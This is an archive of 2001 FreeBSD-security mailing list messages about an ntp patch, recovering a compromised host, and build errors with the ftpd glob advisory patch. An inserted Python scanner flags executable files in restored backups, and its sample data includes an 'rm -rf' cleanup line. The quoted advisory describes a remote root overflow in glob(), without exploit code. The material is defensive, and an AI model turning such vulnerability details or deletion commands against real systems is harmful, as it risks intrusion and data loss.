From: "Yuri A. Wolf" X-Sender: subs@proxy.obk.ru To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: ntp-4.0.99k23? In-Reply-To: <200104190431.f3J4V3S54698@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Apr 2001, Cy Schubert - ITSD Open Systems Group wrote: > > Is the 1st one vulnerable? Is the 2d one ok? > > Both are invulnerable. 4.0.99k_2 is patched by the port (see the files > directory) to fix the vulnerability. 4.0.99k23 has the patches for the > vulnerability built into it. In the end both are equivalent. > Ok, thank you. Those differences in the files directory were the reason for my question. -- Yuri Wolf wolf@ovk.altai.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 2:31:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id A7C9C37B43C for ; Thu, 19 Apr 2001 02:31:28 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA31858; Thu, 19 Apr 2001 11:31:27 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "David G. Andersen" Cc: kris@obsecurity.org (Kris Kennaway), fukuda@alles.ad.jp (fukuda shinichi), freebsd-security@FreeBSD.ORG Subject: Re: unknown process References: <200104190324.VAA14081@faith.cs.utah.edu> 
From: Dag-Erling Smorgrav Date: 19 Apr 2001 11:31:26 +0200 In-Reply-To: <200104190324.VAA14081@faith.cs.utah.edu> Message-ID: Lines: 13 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "David G. Andersen" writes: > You've been hacked. Do what Kris said immediately - take your > system offline, and figure out how they got in. You'll likely > need to either restore from backups, a fresh install, or check > your tripwire/etc logs to determine what else the intruder > changed, if they installed a rootkit, etc. It's not either/or. The only acceptable solution to this situation is a complete reinstall from a trusted source (e.g. original CD set). DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 2:41: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 5E33A37B43C for ; Thu, 19 Apr 2001 02:40:55 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 469 invoked by uid 1000); 19 Apr 2001 09:39:16 -0000 Date: Thu, 19 Apr 2001 12:39:15 +0300 
From: Peter Pentchev To: Dag-Erling Smorgrav Cc: "David G. Andersen" , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process Message-ID: <20010419123915.A446@ringworld.oblivion.bg> Mail-Followup-To: Dag-Erling Smorgrav , "David G. Andersen" , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG References: <200104190324.VAA14081@faith.cs.utah.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Thu, Apr 19, 2001 at 11:31:26AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > "David G. Andersen" writes: > > You've been hacked. Do what Kris said immediately - take your > > system offline, and figure out how they got in. You'll likely > > need to either restore from backups, a fresh install, or check > > your tripwire/etc logs to determine what else the intruder > > changed, if they installed a rootkit, etc. > > It's not either/or. The only acceptable solution to this situation is > a complete reinstall from a trusted source (e.g. original CD set). ..and during the install, examine your backups - people have been known to restore systems from backup, only to find out that the intrusion had happened *before* the backup; sometimes there are months and months of accurately backed up backdoors and stuff. G'luck, Peter -- Thit sentence is not self-referential because "thit" is not a word. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 2:48:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from serenity.mcc.ac.uk (serenity.mcc.ac.uk [130.88.200.93]) by hub.freebsd.org (Postfix) with ESMTP id D6D0C37B43C for ; Thu, 19 Apr 2001 02:48:20 -0700 (PDT) (envelope-from rasputin@freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97] ident=root) by serenity.mcc.ac.uk with esmtp (Exim 2.05 #4) id 14qB2y-000MIb-00 for security@freebsd.org; Thu, 19 Apr 2001 10:48:20 +0100 Received: (from rasputin@localhost) by dogma.freebsd-uk.eu.org (8.11.1/8.11.1) id f3J9mJr25752 for security@freebsd.org; Thu, 19 Apr 2001 10:48:19 +0100 (BST) (envelope-from rasputin) Date: Thu, 19 Apr 2001 10:48:19 +0100 
From: Rasputin To: security@freebsd.org Subject: Re: unknown process Message-ID: <20010419104819.A25707@dogma.freebsd-uk.eu.org> Reply-To: Rasputin References: <200104190324.VAA14081@faith.cs.utah.edu> <20010419123915.A446@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20010419123915.A446@ringworld.oblivion.bg>; from roam@orbitel.bg on Thu, Apr 19, 2001 at 12:39:15PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Peter Pentchev [010419 10:42]: > On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > > "David G. Andersen" writes: > > > You've been hacked. Do what Kris said immediately - take your > > > system offline, and figure out how they got in. You'll likely > > > need to either restore from backups, a fresh install, or check > > > your tripwire/etc logs to determine what else the intruder > > > changed, if they installed a rootkit, etc. > > > > It's not either/or. The only acceptable solution to this situation is > > a complete reinstall from a trusted source (e.g. original CD set). Just a thought - do the cvs servers count as 'trusted'? How feasible would it be to cvsup and installworld? I'd personally go for reinstalling the compiler, cvsup binary, networking packages, etc. from CD first - that probably wouldn't be enough, though, would it? -- Rasputin Jack of All Trades :: Master of Nuns To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 2:56: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 70CC337B43C for ; Thu, 19 Apr 2001 02:56:03 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 5205 invoked by uid 1000); 19 Apr 2001 09:54:27 -0000 Date: Thu, 19 Apr 2001 12:54:27 +0300 
From: Peter Pentchev To: Rasputin Cc: security@freebsd.org Subject: Re: unknown process Message-ID: <20010419125426.B446@ringworld.oblivion.bg> Mail-Followup-To: Rasputin , security@freebsd.org References: <200104190324.VAA14081@faith.cs.utah.edu> <20010419123915.A446@ringworld.oblivion.bg> <20010419104819.A25707@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010419104819.A25707@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Thu, Apr 19, 2001 at 10:48:19AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 19, 2001 at 10:48:19AM +0100, Rasputin wrote: > * Peter Pentchev [010419 10:42]: > > On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > > > "David G. Andersen" writes: > > > > You've been hacked. Do what Kris said immediately - take your > > > > system offline, and figure out how they got in. You'll likely > > > > need to either restore from backups, a fresh install, or check > > > > your tripwire/etc logs to determine what else the intruder > > > > changed, if they installed a rootkit, etc. > > > > > > It's not either/or. The only acceptable solution to this situation is > > > a complete reinstall from a trusted source (e.g. original CD set). > > Just a though - do the cvs servers count as 'trusted'? > How feasible would it be to cvsup and installworld? > > I'd personally go for reinstalling the compiler, cvsup binary, > networking packages, etc from CD > first - that probably wouldn't be enough, though, would it? If you're doing this on the same machine, you should also watch out for kernel modules, rc scripts and stuff.. I say a clean install, and then.. if the previous setup had been right.. all the additional programs and configs should be easily rebuilt/restored from CVS or similar. As to the data, and DATA ONLY, backups should be safe. 
G'luck, Peter -- I am jealous of the first word in this sentence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 3:38:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id DC09337B424 for ; Thu, 19 Apr 2001 03:37:56 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id MAA32082; Thu, 19 Apr 2001 12:37:11 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Peter Pentchev Cc: "David G. Andersen" , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process References: <200104190324.VAA14081@faith.cs.utah.edu> <20010419123915.A446@ringworld.oblivion.bg> 
From: Dag-Erling Smorgrav Date: 19 Apr 2001 12:37:10 +0200 In-Reply-To: <20010419123915.A446@ringworld.oblivion.bg> Message-ID: Lines: 13 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Pentchev writes: > On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > > It's not either/or. The only acceptable solution to this situation is > > a complete reinstall from a trusted source (e.g. original CD set). > ..and during the install, examine your backups A backup is not a trusted source. Never reinstall from backups after a compromise. Restoring user data from backup is acceptable as long as you are certain that none of that data is executable. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 4: 4:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 6DC7937B43C for ; Thu, 19 Apr 2001 04:04:28 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 747 invoked by uid 1000); 19 Apr 2001 11:02:52 -0000 Date: Thu, 19 Apr 2001 14:02:52 +0300 
From: Peter Pentchev To: Dag-Erling Smorgrav Cc: "David G. Andersen" , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process Message-ID: <20010419140252.A454@ringworld.oblivion.bg> Mail-Followup-To: Dag-Erling Smorgrav , "David G. Andersen" , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG References: <200104190324.VAA14081@faith.cs.utah.edu> <20010419123915.A446@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Thu, Apr 19, 2001 at 12:37:10PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 19, 2001 at 12:37:10PM +0200, Dag-Erling Smorgrav wrote: > Peter Pentchev writes: > > On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > > > It's not either/or. The only acceptable solution to this situation is > > > a complete reinstall from a trusted source (e.g. original CD set). > > ..and during the install, examine your backups > > A backup is not a trusted source. Never reinstall from backups after > a compromise. Restoring user data from backup is acceptable as long > as you are certain that none of that data is executable. That's exactly what I said, isn't it? :) Especially in my second message.. G'luck, Peter -- Thit sentence is not self-referential because "thit" is not a word. 
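The rule DES states above (rebuild the system from a trusted source; restore user data from backup only when you are certain none of it is executable) is easy to state and tedious to verify by hand across a restored tree. The scanner below is an added example written for this archive, not code from the thread or from FreeBSD. It walks a restored directory and flags every file that carries an exec, setuid or setgid bit, starts with an interpreter or binary magic number, or is a symlink or special file; anything flagged is reviewed (and normally dropped) before the data goes back onto the rebuilt host. The magic-number list, the sample tree and the file names are constructed for the demonstration and are not exhaustive.

```python
import os
import stat
import tempfile

# Leading bytes that mark executable content regardless of mode bits.
# Constructed list for this example; extend it for the formats you restore.
EXEC_MAGIC = (
    b"\x7fELF",            # ELF executables, shared objects, kernel modules
    b"#!",                 # interpreter scripts (sh, perl, python, ...)
    b"\xca\xfe\xba\xbe",   # Mach-O fat binaries and Java class files
    b"MZ",                 # DOS / Windows PE executables
)


def classify(path):
    """Return the reasons a restored file must be reviewed, or [] if none."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return ["symlink"]          # could point a restored name at a system file
    if not stat.S_ISREG(st.st_mode):
        return ["special file"]     # devices, fifos, sockets do not belong in data
    reasons = []
    if st.st_mode & stat.S_ISUID:
        reasons.append("setuid")
    if st.st_mode & stat.S_ISGID:
        reasons.append("setgid")
    if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        reasons.append("exec bit")
    with open(path, "rb") as fh:
        head = fh.read(4)
    if any(head.startswith(magic) for magic in EXEC_MAGIC):
        reasons.append("executable magic")
    return reasons


def scan_restore_tree(root):
    """Map each flagged file (relative to root) to the reasons it was flagged."""
    flagged = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            reasons = classify(full)
            if reasons:
                flagged[os.path.relpath(full, root)] = reasons
    return flagged


def build_sample_restore(root):
    """Constructed stand-in for a restored user directory (sample data only)."""
    samples = {
        "notes.txt": (b"meeting notes\n", 0o644),
        "report.pdf": (b"%PDF-1.4\n", 0o644),
        "cleanup.sh": (b"#!/bin/sh\nrm -rf /tmp/build\n", 0o755),
        "libhook.so": (b"\x7fELF\x02\x01\x01\x00", 0o644),  # no exec bit, still binary
        "sudo-helper": (b"plain text with a setuid bit\n", 0o4755),
    }
    for name, (data, mode) in samples.items():
        path = os.path.join(root, name)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)


def demo():
    """Build the constructed tree in a temp dir and return the scan result."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_restore(root)
        return scan_restore_tree(root)


if __name__ == "__main__":
    for rel, why in sorted(demo().items()):
        print("%-12s %s" % (rel, ", ".join(why)))
```

Run it against the mount point of the restored dump rather than against the live system, and treat the output as a review list: a stripped ELF with no exec bit (libhook.so above) is exactly the kind of file that a mode-only check would wave through.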
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 4:42:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from liberty.bulinfo.net (liberty.bulinfo.net [212.72.195.7]) by hub.freebsd.org (Postfix) with SMTP id 5393C37B422 for ; Thu, 19 Apr 2001 04:42:13 -0700 (PDT) (envelope-from krassi@bulinfo.net) Received: (qmail 16691 invoked from network); 18 Apr 2001 07:15:28 -0000 Received: from pythia.bulinfo.net (HELO bulinfo.net) (212.72.195.5) by liberty.bulinfo.net with SMTP; 18 Apr 2001 07:15:28 -0000 Message-ID: <3ADD3F02.D54F692D@bulinfo.net> Date: Wed, 18 Apr 2001 10:15:14 +0300 
From: Krassimir Slavchev X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.13 i686) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob References: <200104171909.f3HJ9gH14235@freefall.freebsd.org> Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms577BBB9BCDC5A985EA8A97AF" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a cryptographically signed message in MIME format. --------------ms577BBB9BCDC5A985EA8A97AF Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Hmmm, any ideas? /usr/src# patch -p < /tmp/glob.4.x.patch Hmm... Looks like a unified diff to me... The text leading up to this was: -------------------------- |Index: lib/libc/gen/glob.c |=================================================================== |RCS file: /home/ncvs/src/lib/libc/gen/glob.c,v |--- lib/libc/gen/glob.c 1998/02/20 07:54:56 1.11 |+++ lib/libc/gen/glob.c 2001/04/07 21:00:20 -------------------------- Patching file lib/libc/gen/glob.c using Plan A... Hunk #1 succeeded at 129. Hunk #2 succeeded at 137. Hunk #3 succeeded at 158. Hunk #4 succeeded at 168. Hunk #5 succeeded at 197. Hunk #6 succeeded at 207. Hunk #7 succeeded at 233. Hunk #8 succeeded at 274. Hunk #9 succeeded at 321. Hunk #10 succeeded at 415. Hunk #11 succeeded at 480. Hunk #12 succeeded at 493. Hunk #13 succeeded at 508. Hunk #14 succeeded at 528. Hunk #15 succeeded at 552. Hunk #16 succeeded at 567. Hunk #17 succeeded at 606. Hunk #18 succeeded at 636. Hunk #19 succeeded at 674. Hunk #20 succeeded at 710. Hunk #21 succeeded at 791. Hunk #22 succeeded at 804. Hunk #23 succeeded at 823. Hunk #24 succeeded at 840. Hunk #25 succeeded at 860. Hmm... The next patch looks like a unified diff to me... 
The text leading up to this was: -------------------------- |Index: libexec/ftpd/popen.c |=================================================================== |RCS file: /home/ncvs/src/libexec/ftpd/popen.c,v |--- libexec/ftpd/popen.c 2000/09/20 09:57:58 1.18.2.1 |+++ libexec/ftpd/popen.c 2001/04/07 21:08:09 -------------------------- Patching file libexec/ftpd/popen.c using Plan A... Hunk #1 succeeded at 107. Hmm... The next patch looks like a unified diff to me... The text leading up to this was: -------------------------- |=================================================================== |RCS file: /home/ncvs/src/libexec/ftpd/ftpd.c,v |--- libexec/ftpd/ftpd.c 2001/03/11 13:20:44 1.73 |+++ libexec/ftpd/ftpd.c 2001/03/19 19:11:00 -------------------------- Patching file libexec/ftpd/ftpd.c using Plan A... Hunk #1 succeeded at 189. Hunk #2 succeeded at 2658 (offset 30 lines). Hmm... The next patch looks like a unified diff to me... The text leading up to this was: -------------------------- |=================================================================== |RCS file: /home/ncvs/src/libexec/ftpd/ftpcmd.y,v |--- libexec/ftpd/ftpcmd.y 2001/04/16 22:20:26 1.23 |+++ libexec/ftpd/ftpcmd.y 2001/04/17 03:03:45 -------------------------- Patching file libexec/ftpd/ftpcmd.y using Plan A... Hunk #1 succeeded at 137 (offset -1 lines). Hunk #2 succeeded at 471 (offset -4 lines). Hunk #3 succeeded at 928 (offset -13 lines). Hunk #4 succeeded at 1037 (offset -4 lines). 
done cd /usr/src/lib/libc make all cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o glob.o /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared (first use in this function) /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier is reported only once /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it appears in.) /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared (first use in this function) *** Error code 1 Stop in /usr/src/lib/libc. FreeBSD Security Advisories wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================= > FreeBSD-SA-01:33 Security Advisory > FreeBSD, Inc. > > Topic: globbing vulnerability in ftpd > > Category: core > Module: ftpd/libc > Announced: 2001-04-17 > Credits: John McDonald and Anthony Osborne, COVERT Labs > Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases), > FreeBSD 3.5-STABLE and 4.3-RC prior to the > correction date. > Corrected: 2001-04-17 (FreeBSD 4.3-RC) > 2001-04-17 (FreeBSD 3.5-STABLE) > Vendor status: Corrected > FreeBSD only: NO > > I. Background > > Numerous FTP daemons, including the daemon distributed with FreeBSD, > use server-side globbing to expand pathnames via user input. This > globbing is performed by FreeBSD's glob() implementation in libc. > > II. Problem Description > > The glob() function contains potential buffer overflows that may be > exploitable through the FTP daemon. If a directory with a name of > a certain length is present, a remote user specifying a pathname > using globbing characters may cause arbitrary code to be executed > on the FTP server as user running ftpd, usually root. 
> > Additionally, when given a path containing numerous globbing > characters, the glob() functions may consume significant system > resources when expanding the path. This can be controlled by > setting user limits via /etc/login.conf and setting limits on > globbing expansion. > > All versions of FreeBSD prior to the correction date, including > FreeBSD 3.5.1 and 4.2 contain this problem. The base system that > will ship with FreeBSD 4.3 does not contain this problem since it > was corrected before the release. > > III. Impact > > Remote users may be able to execute arbitrary code on the FTP server > as the user running ftpd, usually root. > > The FTP daemon supplied with FreeBSD is enabled by default to allow > access to authorized local users and not anonymous users, thus > limiting the impact to authorized local users. > > IV. Workaround > > If the FTP daemon is executed from inetd, disable the FTP daemon by > commenting out the ftp line in /etc/inetd.conf, then reload the > inetd configuration by executing the following command as root: > > # killall -HUP inetd > > V. Solution > > One of the following: > > 1) Upgrade to FreeBSD 4.3-RC or 3.5.1-STABLE after the correction > date. > > 2) Download the patch and detached PGP signature from the following > location: > > The following patch applies to FreeBSD 4.x: > > # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch > # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch.asc > > The following patch applies to FreeBSD 3.x: > > # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch > # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch.asc > > Verify the detached signature using your PGP utility. 
> > Issue the following commands as root: > > # cd /usr/src > # patch -p < /path/to/patch > # cd /usr/src/lib/libc > # make all install > # cd /usr/src/libexec/ftpd > # make all install > > If the FTP daemon is running standalone, it will have to be manually > stopped and restarted. > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iQCVAwUBOtyT/VUuHi5z0oilAQGiIAP8CJ6Hsp52DuBQhQnA4xBl23kTCtCUKdPf > zRP5yg5B9w+j+6Q6+k2P1B9lv5JcdvmS8+fzfrWUpUAogqkbL5f0njS7fnA68a5H > oiGJgWqLQiMQiszeOOpgqvd1fNRCcCX+SgYewIfP93Cvam+GG+TvZQziV2zcne3O > tjBG/FVzXkg= > =P1j0 > -----END PGP SIGNATURE----- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Krassimir Slavchev Bulinfo Ltd. krassi@bulinfo.net (+359-2)963-3652 http://www.bulinfo.net (+359-2)963-3764 --------------ms577BBB9BCDC5A985EA8A97AF Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIIH7AYJKoZIhvcNAQcCoIIH3TCCB9kCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC Bb0wggKhMIICCqADAgECAgMCdTowDQYJKoZIhvcNAQEEBQAwgZQxCzAJBgNVBAYTAlpBMRUw EwYDVQQIEwxXZXN0ZXJuIENhcGUxFDASBgNVBAcTC0R1cmJhbnZpbGxlMQ8wDQYDVQQKEwZU aGF3dGUxHTAbBgNVBAsTFENlcnRpZmljYXRlIFNlcnZpY2VzMSgwJgYDVQQDEx9QZXJzb25h bCBGcmVlbWFpbCBSU0EgMTk5OS45LjE2MB4XDTAwMDQxOTEwMzAzN1oXDTAxMDQxOTEwMzAz N1owRDEfMB0GA1UEAxMWVGhhd3RlIEZyZWVtYWlsIE1lbWJlcjEhMB8GCSqGSIb3DQEJARYS a3Jhc3NpQGJ1bGluZm8ubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDAIbgn84q8 UBjjtrZ04/Mo4o8WeALj1B7DzOAD+ykhAi0evRBwXNqhZ7oS3zjYDibfHJaEu5XNbeYLu7eQ VwysyzZxHT/GT3VJjO/KsTQc/eWz687v+8VUPrtiudAGBg+B31fXtoYPVF1GA38YwrCPndTL wTnqpKhTrOVTJ9HtnwIDAQABo1AwTjAdBgNVHREEFjAUgRJrcmFzc2lAYnVsaW5mby5uZXQw DAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBSIq/Fgg2ZV9ORYx0YdwGG9I9fDjDANBgkqhkiG 
9w0BAQQFAAOBgQBmWTQ4bEjN+WOEhKjJkCpBe87AXZjnfCaOVf1tCIZZPQInnUloyTwTDlll u2eBc9R4++ZgfQksENPbNx2hNbf2I8sNiEENhtVSHvsiJxebB1QEVbehoYMTP2M3fWIJMuF7 H+cDLofptD095Xa+XpocifT/VfcneTr9ph5X80KGSzCCAxQwggJ9oAMCAQICAQswDQYJKoZI hvcNAQEEBQAwgdExCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNV BAcTCUNhcGUgVG93bjEaMBgGA1UEChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNVBAsTH0Nl cnRpZmljYXRpb24gU2VydmljZXMgRGl2aXNpb24xJDAiBgNVBAMTG1RoYXd0ZSBQZXJzb25h bCBGcmVlbWFpbCBDQTErMCkGCSqGSIb3DQEJARYccGVyc29uYWwtZnJlZW1haWxAdGhhd3Rl LmNvbTAeFw05OTA5MTYxNDAxNDBaFw0wMTA5MTUxNDAxNDBaMIGUMQswCQYDVQQGEwJaQTEV MBMGA1UECBMMV2VzdGVybiBDYXBlMRQwEgYDVQQHEwtEdXJiYW52aWxsZTEPMA0GA1UEChMG VGhhd3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29u YWwgRnJlZW1haWwgUlNBIDE5OTkuOS4xNjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA s2lal9TQFgt6tcVd6SGcI3LNEkxL937Px/vKciT0QlKsV5Xje2F6F4Tn/XI5OJS06u1lp5IG Xr3gZfYZu5R5dkw+uWhwdYQc9BF0ALwFLE8JAxcxzPRB1HLGpl3iiESwiy7ETfHw1oU+bPOV lHiRfkDpnNGNFVeOwnPlMN5G9U8CAwEAAaM3MDUwEgYDVR0TAQH/BAgwBgEB/wIBADAfBgNV HSMEGDAWgBRyScJzNMZV9At2coF+d/SH58ayDjANBgkqhkiG9w0BAQQFAAOBgQBrxlnpMfrp tuyxA9jfcnL+kWBI6sZV3XvwZ47GYXDnbcKlN9idtxcoVgWL3Vx1b8aRkMZsZnET0BB8a5Fv huAhNi3B1+qyCa3PLW3Gg1Kb+7v+nIed/LfpdJLkXJeu/H6syg1vcnpnLGtz9Yb5nfUAbvQd B86dnoJjKe+TCX5V3jGCAfcwggHzAgEBMIGcMIGUMQswCQYDVQQGEwJaQTEVMBMGA1UECBMM V2VzdGVybiBDYXBlMRQwEgYDVQQHEwtEdXJiYW52aWxsZTEPMA0GA1UEChMGVGhhd3RlMR0w GwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwgRnJlZW1h aWwgUlNBIDE5OTkuOS4xNgIDAnU6MAkGBSsOAwIaBQCggbEwGAYJKoZIhvcNAQkDMQsGCSqG SIb3DQEHATAcBgkqhkiG9w0BCQUxDxcNMDEwNDE4MDcxNTE1WjAjBgkqhkiG9w0BCQQxFgQU Qg1A9d7up+g81DkWY3SC1RBx34IwUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggq hkiG9w0DAgICAIAwBwYFKw4DAgcwDQYIKoZIhvcNAwICAUAwDQYIKoZIhvcNAwICASgwDQYJ KoZIhvcNAQEBBQAEgYAHSvgTrcIF3gw38MOaGnr/tT1vk3J07QxFERxDqLNvPTB5zAORFKWP YeCmn2i+TROHHnts8c7QUZ8RaFuJMNWLAGN6osNju6B5v8vvJELxGPMx8lKnYRhprHY7548a wc7GZuP/8Ucdr+nSQffQgfcSndcFy99yVS/qq/qPp3nx+w== --------------ms577BBB9BCDC5A985EA8A97AF-- To 

From owner-freebsd-security Thu Apr 19 4:46:27 2001
To: security@freebsd.org
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd)
From: Katsuichi Tachibana
Message-Id: <20010419204555Q.tatibana@splbp2.netlab.nec.co.jp>
Date: Thu, 19 Apr 2001 20:45:55 +0900

From: Fernando Schapachnik
> > > Where are GLOB_LIMIT and GLOB_MAXPATH supposed to be defined?
> > >
> >
> > The advisory patch is missing the glob.h patch along with the
> > instruction to copy the resulting glob.h to /usr/include.
> >
> > Quick fix is to either get the diff or entire file from
> > http://www.FreeBSD.org/cgi/cvsweb.cgi/src/include/glob.h,
> > copy the resulting file to /usr/include and build.
> >

Obviously, it worked. Thanks!

So, I wonder why the Security Officers don't update the
